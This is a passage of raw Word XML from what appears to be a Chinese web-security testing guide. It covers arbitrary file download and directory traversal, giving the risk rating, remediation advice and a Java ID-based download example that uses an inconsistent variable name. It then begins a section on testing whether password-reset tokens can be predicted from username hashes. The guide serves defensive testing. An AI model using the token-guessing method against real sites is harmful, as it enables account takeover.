          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>设计者设计的</w:t>
      </w:r>
      <w:r w:rsidR="003E5213" w:rsidRPr="009170E6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>web</w:t>
      </w:r>
      <w:r w:rsidR="003E5213" w:rsidRPr="009170E6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>内容没有恰当的访问控制，允许</w:t>
      </w:r>
      <w:r w:rsidR="003E5213" w:rsidRPr="009170E6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>http</w:t>
      </w:r>
      <w:r w:rsidR="003E5213" w:rsidRPr="009170E6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>遍历，攻击者就可以访问受限的目录，并可以在</w:t>
      </w:r>
      <w:r w:rsidR="003E5213" w:rsidRPr="009170E6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>web</w:t>
      </w:r>
      <w:r w:rsidR="003E5213" w:rsidRPr="009170E6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>根目录以外执行命令。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3394F849" w14:textId="77777777"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风险等级：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7505E13B" w14:textId="580394CC" w:rsidR="00757422" w:rsidRPr="009170E6" w:rsidRDefault="00ED0BC6" w:rsidP="009170E6">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009170E6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="009170E6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>【</w:t>
      </w:r>
      <w:r w:rsidRPr="009170E6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>高危</w:t>
      </w:r>
      <w:r w:rsidRPr="009170E6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>】</w:t>
      </w:r>
      <w:r w:rsidRPr="009170E6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：各场景通用</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D9E9708" w14:textId="77777777"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修复方案：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A25FF94"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净化数据：对用户传过来的文件名参数进行硬编码或统一编码，对文件类型进行白名单控制，对包含恶意字符或者空字符的参数进行拒绝。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ECABB64"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web</w:t>
      </w:r>
      <w:r w:rsidRPr="009170E6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>应用程序可以使用</w:t>
      </w:r>
      <w:r w:rsidRPr="009170E6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>chroot</w:t>
      </w:r>
      <w:r w:rsidRPr="009170E6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>环境包含被访问的</w:t>
      </w:r>
      <w:r w:rsidRPr="009170E6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>web</w:t>
      </w:r>
      <w:r w:rsidRPr="009170E6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>目录，或者使用绝对路径</w:t>
      </w:r>
      <w:r w:rsidRPr="009170E6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
      <w:r w:rsidRPr="009170E6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参数来访问文件目录，时使其即使越权也在访问目录之内。</w:t>
      </w:r>
      <w:r w:rsidRPr="009170E6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>www</w:t>
      </w:r>
      <w:r w:rsidRPr="009170E6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>目录就是一个</w:t>
      </w:r>
      <w:r w:rsidRPr="009170E6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>chroot</w:t>
      </w:r>
      <w:r w:rsidRPr="009170E6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>应用</w:t>
      </w:r>
      <w:r w:rsidRPr="009170E6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="009170E6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>由</w:t>
      </w:r>
      <w:r w:rsidRPr="009170E6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>chroot</w:t>
      </w:r>
      <w:r w:rsidRPr="009170E6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>创造出的那个根目录，叫做“</w:t>
      </w:r>
      <w:r w:rsidRPr="009170E6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>chroot</w:t>
      </w:r>
      <w:r w:rsidRPr="009170E6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>监狱”（所谓</w:t>
      </w:r>
      <w:r w:rsidRPr="009170E6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidRPr="009170E6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>监狱</w:t>
      </w:r>
      <w:r w:rsidRPr="009170E6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidRPr="009170E6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>就是指通过</w:t>
      </w:r>
      <w:r w:rsidRPr="009170E6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>chroot</w:t>
      </w:r>
      <w:r w:rsidRPr="009170E6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>机制来更改某个进程所能看到的根目录，即将某进程限制在指定目录中，保证该进程只能对该目录及其子目录的文件有所动作，从而保证整个服务器的安全，详细具体</w:t>
      </w:r>
      <w:r w:rsidRPr="009170E6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>chroot</w:t>
      </w:r>
      <w:r w:rsidRPr="009170E6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的用法，可参考：</w:t>
      </w:r>
      <w:r w:rsidRPr="009170E6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>http://blog.csdn.net/frozen_fish/arti</w:t>
      </w:r>
      <w:r w:rsidRPr="009170E6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>cle/details/2244870</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3283B103"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任意文件下载漏洞也有可能是</w:t>
      </w:r>
      <w:r w:rsidRPr="009170E6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>web</w:t>
      </w:r>
      <w:r w:rsidRPr="009170E6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>所采用的中间件的版本低而导致问题的产生，例如</w:t>
      </w:r>
      <w:r w:rsidRPr="009170E6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ibm</w:t>
      </w:r>
      <w:r w:rsidRPr="009170E6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="009170E6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>websphere</w:t>
      </w:r>
      <w:r w:rsidRPr="009170E6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的任意文件下载漏洞，需更新其中间件的版本可修复。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="012A9716"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要下载的文件地址保存至数据库中。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59F2D60C"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文件路径保存至数据库，让用户提交文件对应</w:t>
      </w:r>
      <w:r w:rsidRPr="009170E6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ID</w:t>
      </w:r>
      <w:r w:rsidRPr="009170E6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>下载文件。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="540A66E5"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用户下载文件之前需要进行权限判断。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E1A5102"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文件放在</w:t>
      </w:r>
      <w:r w:rsidRPr="009170E6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>web</w:t>
      </w:r>
      <w:r w:rsidRPr="009170E6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>无法直接访问的目录下。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42A29032"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不允许提供目录遍历服务。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7182992A"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公开文件可放置在</w:t>
      </w:r>
      <w:r w:rsidRPr="009170E6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>web</w:t>
      </w:r>
      <w:r w:rsidRPr="009170E6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>应用程序下载目录中通过链接进行下载。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A3AD9A4" w14:textId="77777777" w:rsidR="0015772D" w:rsidRPr="009170E6" w:rsidRDefault="0015772D" w:rsidP="009170E6">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009170E6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考代码：</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af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494"/>
      </w:tblGrid>
      <w:tr w:rsidR="00505424" w:rsidRPr="009170E6" w14:paraId="10CF7D8A" w14:textId="77777777" w:rsidTr="00943EE0">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8494" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="7085B7DB"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public String download() throws Exception {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="54EB42A5"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hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:r w:rsidRPr="009170E6">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
              </w:rPr>
              <w:tab/>
              <w:t>//</w:t>
            </w:r>
            <w:r w:rsidRPr="009170E6">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>获取文件</w:t>
            </w:r>
            <w:r w:rsidRPr="009170E6">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>id</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="606897F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String id = Struts2Utils.getRequest().getParameter("id");</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="279AF1BE"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try {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7E38C80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hint="eastAsia"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="009170E6">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="009170E6">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
              </w:rPr>
              <w:tab/>
              <w:t>//</w:t>
            </w:r>
            <w:r w:rsidRPr="009170E6">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>通过</w:t>
            </w:r>
            <w:r w:rsidRPr="009170E6">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>id</w:t>
            </w:r>
            <w:r w:rsidRPr="009170E6">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>进行文件查询</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="635EDC15"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DownloadFile downFile = fileService.findEntityById(Long.parseLong(id));</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="492DF12A"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hint="eastAsia"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="009170E6">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="009170E6">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
              </w:rPr>
              <w:tab/>
              <w:t xml:space="preserve">// </w:t>
            </w:r>
            <w:r w:rsidRPr="009170E6">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>获取该附件的类型</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0289A271"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byte[] bt = null;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="752975C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 xml:space="preserve">bt = downFile.getContent(); </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5298645B"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HttpServletResponse res  =Struts2Utils.getResponse();</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3B4EDACA"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res.reset();</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5B2C4827"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res.setContentType("application/x-msdownload");</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4CD8F907"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lastRenderedPageBreak/>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="009170E6">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="009170E6">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
              </w:rPr>
              <w:tab/>
              <w:t>res.setHeader("Content-Disposition", "attachment;filename="+ URLEncoder.encode(uacFile.getName(), "UTF-8"));</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3AD65ADC"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putStream out = res.getOutputStream();</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4C68712E"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write(bt);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5DCAC195"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flush();</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4671631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close();</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="06F37420"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 catch (Exception e1) {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="44BAB263"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e1.printStackTrace();</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="495A53BC"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w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="294B2FFC"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return null;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6205BA78" w14:textId="4774F9C3" w:rsidR="00505424" w:rsidRPr="009170E6" w:rsidRDefault="00505424" w:rsidP="009170E6">
            <w:pPr>
              <w:spacing w:line="300" w:lineRule="auto"/>
              <w:ind w:firstLine="420"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009170E6">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
              </w:rPr>
              <w:t>}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2167E068" w14:textId="77777777" w:rsidR="00757422" w:rsidRPr="009170E6" w:rsidRDefault="00757422" w:rsidP="009170E6">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="138B4F5D" w14:textId="380380B3" w:rsidR="006F6387" w:rsidRPr="00AD537C" w:rsidRDefault="006F6387" w:rsidP="00AD537C">
      <w:pPr>
        <w:pStyle w:val="20"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="23" w:name="_Toc498434485"/>
      <w:r w:rsidRPr="00AD537C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>信息猜解</w:t>
      </w:r>
      <w:bookmarkEnd w:id="23"/>
    </w:p>
    <w:p w14:paraId="62705403" w14:textId="0B9B17EA" w:rsidR="006F6387" w:rsidRPr="00D70C72" w:rsidRDefault="006F6387" w:rsidP="00A82BA3">
      <w:pPr>
        <w:pStyle w:val="31"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="24" w:name="_Toc498434486"/>
      <w:r w:rsidRPr="00D70C72">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>邮件内容中请求链接可预测</w:t>
      </w:r>
      <w:bookmarkEnd w:id="24"/>
    </w:p>
    <w:p w14:paraId="4E7455C2" w14:textId="5281D60D" w:rsidR="006F6387" w:rsidRPr="009170E6" w:rsidRDefault="006F6387" w:rsidP="009170E6">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009170E6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>漏洞描述：</w:t>
      </w:r>
      <w:r w:rsidR="00F26EE3" w:rsidRPr="009170E6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>邮件中的重置密码等链接可预测，导致链接可以直接被猜解访问。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="600ADCD3" w14:textId="77777777" w:rsidR="006F6387" w:rsidRPr="009170E6" w:rsidRDefault="006F6387" w:rsidP="009170E6">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009170E6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>测试方法：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4839377E" w14:textId="77777777" w:rsidR="00D85A67" w:rsidRPr="009170E6" w:rsidRDefault="00E40613" w:rsidP="009170E6">
      <w:pPr>
        <w:pStyle w:val="af1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009170E6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>先按照正常流程</w:t>
      </w:r>
      <w:r w:rsidR="00D85A67" w:rsidRPr="009170E6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>重置密码，接收重置密码邮件，分析重置链接的构造。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29671A84" w14:textId="79AC13FA" w:rsidR="00D85A67" w:rsidRPr="009170E6" w:rsidRDefault="00D85A67" w:rsidP="009170E6">
      <w:pPr>
        <w:pStyle w:val="af1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009170E6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通常情况下链接中会使用</w:t>
      </w:r>
      <w:r w:rsidRPr="009170E6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>token</w:t>
      </w:r>
      <w:r w:rsidRPr="009170E6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参数使得链接具有唯一性，判断该参数是否可预测。如用户名的</w:t>
      </w:r>
      <w:r w:rsidRPr="009170E6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>md5</w:t>
      </w:r>
      <w:r w:rsidRPr="009170E6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>值，用户名</w:t>
      </w:r>
      <w:r w:rsidRPr="009170E6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
      <w:r w:rsidRPr="009170E6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>时间戳</w:t>
      </w:r>
      <w:r w:rsidR="007C3AEA" w:rsidRPr="009170E6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidR="007C3AEA" w:rsidRPr="009170E6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>md5</w:t>
      </w:r>
      <w:r w:rsidR="007C3AEA" w:rsidRPr="009170E6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>值等。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57426027" w14:textId="36C52AB4" w:rsidR="006F6387" w:rsidRPr="009170E6" w:rsidRDefault="00C24790" w:rsidP="009170E6">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009170E6">
        <w:rPr>
